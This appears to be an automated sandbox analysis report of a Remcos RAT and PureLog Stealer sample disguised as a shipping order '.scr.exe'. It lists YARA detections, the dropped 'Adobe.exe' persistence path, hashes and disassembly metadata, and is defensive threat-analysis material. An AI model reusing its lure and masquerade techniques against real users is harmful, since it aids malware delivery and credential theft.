                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:18:00:58
                                                    Start date:28/11/2024
                                                    Path:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                                                    Imagebase:0xb10000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:18:00:58
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x10000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xb0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x2d0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x760000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:18:01:09
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xb30000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:18:01:11
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xec0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:18:01:17
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x3e0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:18:01:18
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x840000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:18:01:26
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xaf0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:18:01:26
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xfb0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:10.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:120
                                                      Total number of Limit Nodes:9
                                                      execution_graph 39295 11cd01c 39296 11cd034 39295->39296 39297 11cd08e 39296->39297 39300 5282818 39296->39300 39305 5282809 39296->39305 39301 5282845 39300->39301 39302 5282877 39301->39302 39310 52829a0 39301->39310 39314 5282990 39301->39314 39306 5282845 39305->39306 39307 5282877 39306->39307 39308 52829a0 2 API calls 39306->39308 39309 5282990 2 API calls 39306->39309 39308->39307 39309->39307 39312 52829b4 39310->39312 39311 5282a40 39311->39302 39318 5282a58 39312->39318 39316 52829a0 39314->39316 39315 5282a40 39315->39302 39317 5282a58 2 API calls 39316->39317 39317->39315 39319 5282a69 39318->39319 39321 5284012 39318->39321 39319->39311 39325 5284030 39321->39325 39329 5284040 39321->39329 39322 528402a 39322->39319 39326 5284040 39325->39326 39327 52840da CallWindowProcW 39326->39327 39328 5284089 39326->39328 39327->39328 39328->39322 39330 5284082 39329->39330 39332 5284089 39329->39332 39331 52840da CallWindowProcW 39330->39331 39330->39332 39331->39332 39332->39322 39341 2bb4668 39342 2bb467a 39341->39342 39343 2bb4686 39342->39343 39345 2bb4779 39342->39345 39346 2bb479d 39345->39346 39350 2bb4888 39346->39350 39354 2bb4878 39346->39354 39352 2bb48af 39350->39352 39351 2bb498c 39351->39351 39352->39351 39358 2bb44b0 39352->39358 39356 2bb4888 39354->39356 39355 2bb498c 39355->39355 39356->39355 39357 2bb44b0 CreateActCtxA 39356->39357 39357->39355 39359 2bb5918 CreateActCtxA 39358->39359 39361 2bb59db 39359->39361 39333 2bbad30 39336 2bbae28 39333->39336 39334 2bbad3f 39337 2bbae5c 39336->39337 39338 2bbae39 39336->39338 39337->39334 39338->39337 39339 2bbb060 GetModuleHandleW 39338->39339 39340 2bbb08d 39339->39340 39340->39334 39436 2bbd0c0 39437 2bbd106 39436->39437 39441 2bbd6a8 39437->39441 39444 2bbd699 39437->39444 39438 2bbd1f3 39447 2bbd2fc 39441->39447 39445 2bbd6d6 39444->39445 39446 2bbd2fc DuplicateHandle 39444->39446 39445->39438 39446->39445 39448 2bbd710 DuplicateHandle 39447->39448 39449 2bbd6d6 39448->39449 39449->39438 39362 72f6cc1 39363 72f6cc7 CloseHandle 39362->39363 39364 72f6d2f 39363->39364 39365 72f0040 39366 72f006a 39365->39366 39367 72f007b 39365->39367 39368 72f0109 39367->39368 39371 72f0360 39367->39371 39376 72f0370 39367->39376 39372 72f0398 39371->39372 39373 72f049e 39372->39373 39381 72f0e48 39372->39381 39386 72f0e90 39372->39386 39373->39366 39378 72f0398 39376->39378 39377 72f049e 39377->39366 39378->39377 39379 72f0e48 DrawTextExW 39378->39379 39380 72f0e90 DrawTextExW 39378->39380 39379->39377 39380->39377 39382 72f0e4d 39381->39382 39391 72f12a0 39382->39391 39395 72f12b0 39382->39395 39383 72f0f1c 39383->39373 39387 72f0ea6 39386->39387 39389 72f12a0 DrawTextExW 39387->39389 39390 72f12b0 DrawTextExW 39387->39390 39388 72f0f1c 39388->39373 39389->39388 39390->39388 39399 72f12e0 39391->39399 39404 72f12f0 39391->39404 39392 72f12ce 39392->39383 39396 72f12ce 39395->39396 39397 72f12e0 DrawTextExW 39395->39397 39398 72f12f0 DrawTextExW 39395->39398 39396->39383 39397->39396 39398->39396 39400 72f1321 39399->39400 39401 72f134e 39400->39401 39409 72f1360 39400->39409 39414 72f1370 39400->39414 39401->39392 39405 72f1321 39404->39405 39406 72f134e 39405->39406 39407 72f1360 DrawTextExW 39405->39407 39408 72f1370 DrawTextExW 39405->39408 39406->39392 39407->39406 39408->39406 39410 72f1391 39409->39410 39411 72f13a6 39410->39411 39419 72f0cac 39410->39419 39411->39401 39413 72f1411 39416 72f1391 39414->39416 39415 72f13a6 39415->39401 39416->39415 39417 72f0cac DrawTextExW 39416->39417 39418 72f1411 39417->39418 39421 72f0cb7 39419->39421 39420 72f2fd9 39420->39413 39421->39420 39425 72f3f60 39421->39425 39428 72f3f4f 39421->39428 39422 72f30ec 39422->39413 39432 72f329c 39425->39432 39429 72f3f60 39428->39429 39430 72f329c DrawTextExW 39429->39430 39431 72f3f7d 39430->39431 39431->39422 39434 72f3f98 DrawTextExW 39432->39434 39435 72f3f7d 39434->39435 39435->39422

                                                      Executed Functions

                                                      Function 072FAA60 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 72faa60-72faa81 296 72faa88-72fab74 295->296 297 72faa83 295->297 299 72fab7a-72facce 296->299 300 72fb3a3-72fb3cb 296->300 297->296 344 72facd4-72fad2f 299->344 345 72fb371-72fb3a0 299->345 303 72fbaac-72fbab5 300->303 304 72fbabb-72fbad2 303->304 305 72fb3d9-72fb3e2 303->305 307 72fb3e9-72fb4dd 305->307 308 72fb3e4 305->308 327 72fb4df-72fb4eb 307->327 328 72fb507 307->328 308->307 330 72fb4ed-72fb4f3 327->330 331 72fb4f5-72fb4fb 327->331 329 72fb50d-72fb52d 328->329 336 72fb52f-72fb55d 329->336 337 72fb58d-72fb605 329->337 332 72fb505 330->332 331->332 332->329 343 72fb569-72fb588 336->343 355 72fb65c-72fb69f 337->355 356 72fb607-72fb65a 337->356 350 72fbaa9 343->350 353 72fad34-72fad3f 344->353 354 72fad31 344->354 345->300 350->303 357 72fb283-72fb289 353->357 354->353 383 72fb6aa-72fb6b0 355->383 356->383 359 72fb28f-72fb30c 357->359 360 72fad44-72fad62 357->360 400 72fb35b-72fb361 359->400 361 72fadb9-72fadce 360->361 362 72fad64-72fad68 360->362 366 72fadd5-72fadeb 361->366 367 72fadd0 361->367 362->361 365 72fad6a-72fad75 362->365 369 72fadab-72fadb1 365->369 372 72faded 366->372 373 72fadf2-72fae09 366->373 367->366 377 72fad77-72fad7b 369->377 378 72fadb3-72fadb4 369->378 372->373 375 72fae0b 373->375 376 72fae10-72fae26 373->376 375->376 381 72fae2d-72fae34 376->381 382 72fae28 376->382 379 72fad7d 377->379 380 72fad81-72fad99 377->380 384 72fae37-72faea8 378->384 379->380 387 72fad9b 380->387 388 72fada0-72fada8 380->388 381->384 382->381 389 72fb707-72fb713 383->389 390 72faebe-72fb036 384->390 391 72faeaa 384->391 387->388 388->369 393 72fb715-72fb79b 389->393 394 72fb6b2-72fb6d4 389->394 401 72fb04c-72fb187 390->401 402 72fb038 390->402 391->390 392 72faeac-72faeb8 391->392 392->390 423 72fb920-72fb929 393->423 396 72fb6db-72fb704 394->396 397 72fb6d6 394->397 396->389 397->396 404 72fb30e-72fb358 400->404 405 72fb363-72fb369 400->405 413 72fb1eb-72fb200 401->413 414 72fb189-72fb18d 401->414 402->401 406 72fb03a-72fb046 402->406 404->400 405->345 406->401 418 72fb207-72fb228 413->418 419 72fb202 413->419 414->413 416 72fb18f-72fb19e 414->416 422 72fb1dd-72fb1e3 416->422 420 72fb22f-72fb24e 418->420 421 72fb22a 418->421 419->418 427 72fb255-72fb275 420->427 428 72fb250 420->428 421->420 429 72fb1e5-72fb1e6 422->429 430 72fb1a0-72fb1a4 422->430 425 72fb92f-72fb988 423->425 426 72fb7a0-72fb7b5 423->426 452 72fb9bf-72fb9e9 425->452 453 72fb98a-72fb9bd 425->453 433 72fb7be-72fb914 426->433 434 72fb7b7 426->434 435 72fb27c 427->435 436 72fb277 427->436 428->427 437 72fb280 429->437 431 72fb1ae-72fb1cf 430->431 432 72fb1a6-72fb1aa 430->432 439 72fb1d6-72fb1da 431->439 440 72fb1d1 431->440 432->431 454 72fb91a 433->454 434->433 441 72fb84e-72fb88e 434->441 442 72fb809-72fb849 434->442 443 72fb7c4-72fb804 434->443 444 72fb893-72fb8d3 434->444 435->437 436->435 437->357 439->422 440->439 441->454 442->454 443->454 444->454 461 72fb9f2-72fba9d 452->461 453->461 454->423 461->350
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q$TJbq$Te]q$paq$xb`q
                                                      • API String ID: 0-1123639052
                                                      • Opcode ID: b5d0c518ff4d2f321d7f81c80aca50cd2a767436f628723431541f03ad577b71
                                                      • Instruction ID: b83e14264b0dfb31aac7e0e2f90deae79c2fec74f2e4a41ac3a14c319fbff761
                                                      • Opcode Fuzzy Hash: b5d0c518ff4d2f321d7f81c80aca50cd2a767436f628723431541f03ad577b71
                                                      • Instruction Fuzzy Hash: 5EB2D5B5E10229CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                      Function 072FA770 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: a734d27d8c97711f83f1d029cd65452257b25701d348e102eb8fdadb903669b9
                                                      • Instruction ID: aa3ca5566324629c7c2ae2583ddf276e1e7bc2a44b54f2816352fbe087865b76
                                                      • Opcode Fuzzy Hash: a734d27d8c97711f83f1d029cd65452257b25701d348e102eb8fdadb903669b9
                                                      • Instruction Fuzzy Hash: 42610971E152059FD709EF7AE98169ABFF6FF88304F14C56AD0089B229FB345806CB40
                                                      Function 05286CE8 Relevance: .9, Instructions: 851COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b60f50cc035d50bc77cd2b9de191162afece0e600c431983f5b2c5959b7cca69
                                                      • Instruction ID: 86bf7934b383d8ac61ddf78fe7f439c330129d88ea20934b5f9e18e5b1a9ba55
                                                      • Opcode Fuzzy Hash: b60f50cc035d50bc77cd2b9de191162afece0e600c431983f5b2c5959b7cca69
                                                      • Instruction Fuzzy Hash: EC92A234A51219CFCB24EB64C998BE9B7B1FF89301F1581E9D9096B361DB31AE85CF40
                                                      Function 05286CE1 Relevance: .8, Instructions: 847COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af82d4ee52d65c3d84c11bd8e936c2c4db3792c9bc79e67c009e4b95afe8b8c0
                                                      • Instruction ID: ce53a81d55a62c84b1a8e499c253a33acc1d1e284769b2c6b9b5d96f7b57e14d
                                                      • Opcode Fuzzy Hash: af82d4ee52d65c3d84c11bd8e936c2c4db3792c9bc79e67c009e4b95afe8b8c0
                                                      • Instruction Fuzzy Hash: 2892A334A51219CFCB24EB64C998BE9B7B1FF89301F1181E9D9096B361DB31AE85DF40
                                                      Function 072FD708 Relevance: .2, Instructions: 239COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b651b6356be0a8e0a5e2c4b9861e32a0b436b18aa9836391f9c680154c3b0da
                                                      • Instruction ID: 2e878d569678d481dab40a17cd967daf8dcab6aa1062d3efa82d650f9bd872a4
                                                      • Opcode Fuzzy Hash: 9b651b6356be0a8e0a5e2c4b9861e32a0b436b18aa9836391f9c680154c3b0da
                                                      • Instruction Fuzzy Hash: 04A1F1B4E25229CFDB14DFA6C8547EDFBB6BF8A300F109069D509AB251DB744985CF01
                                                      Function 072FD6FB Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85f68b094f518fbc734d4a5fd3ffa3f12ce1acd0641f9e70877dd8305b766b37
                                                      • Instruction ID: e48754c96cf8b8c401c16ab3c0092bc0a063be38386bfc6b3bc68959d57aa2c3
                                                      • Opcode Fuzzy Hash: 85f68b094f518fbc734d4a5fd3ffa3f12ce1acd0641f9e70877dd8305b766b37
                                                      • Instruction Fuzzy Hash: 8CA103B4E25229CFDB14CFA6C8547EDFBB2BF8A300F1090AAD509AB251DB744985CF41
                                                      Function 072FDCFE Relevance: .2, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b94cb61b6a5dc8d9992f7344a850ad91ec2a4edf6b7c4bd39f806c7641317ac
                                                      • Instruction ID: f5da651afc6b5c50898dc0fec96ec0102522cf65d7f3274226cfd20f7f191308
                                                      • Opcode Fuzzy Hash: 9b94cb61b6a5dc8d9992f7344a850ad91ec2a4edf6b7c4bd39f806c7641317ac
                                                      • Instruction Fuzzy Hash: FA81E0B4E29219CFCB14CFA9C494AEDFBF5BB4A300F14916AD509AB306D7B09981CF50
                                                      Function 072FDC1B Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ee93d2d79e898c35b2d28927846f9261bfef9df30e7022b9419b87ca6cd83cb
                                                      • Instruction ID: 9a46bf70e93bf5186ed4901de50a928ccced637fc1b69f6bb40823789ef9d3d2
                                                      • Opcode Fuzzy Hash: 3ee93d2d79e898c35b2d28927846f9261bfef9df30e7022b9419b87ca6cd83cb
                                                      • Instruction Fuzzy Hash: 1731C1B1E146188BEB18CFABC84469EFFF6AFC9300F14C16AD818AB225DB705941CF50
                                                      Function 072FDC28 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19aa3e9adf096e17465eca21c421a4320a75eecab5b39ee9481395a5b36bf182
                                                      • Instruction ID: 03237565e0d9851f0e70f0145bc1fb60f282851d1981ff13c2dfafdf5ab19976
                                                      • Opcode Fuzzy Hash: 19aa3e9adf096e17465eca21c421a4320a75eecab5b39ee9481395a5b36bf182
                                                      • Instruction Fuzzy Hash: 9F3191B1E146188BEB18CFABC84469EFAF7AFC9300F14C16AD418AB225EB705541CF50
                                                      Function 02BBAE28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
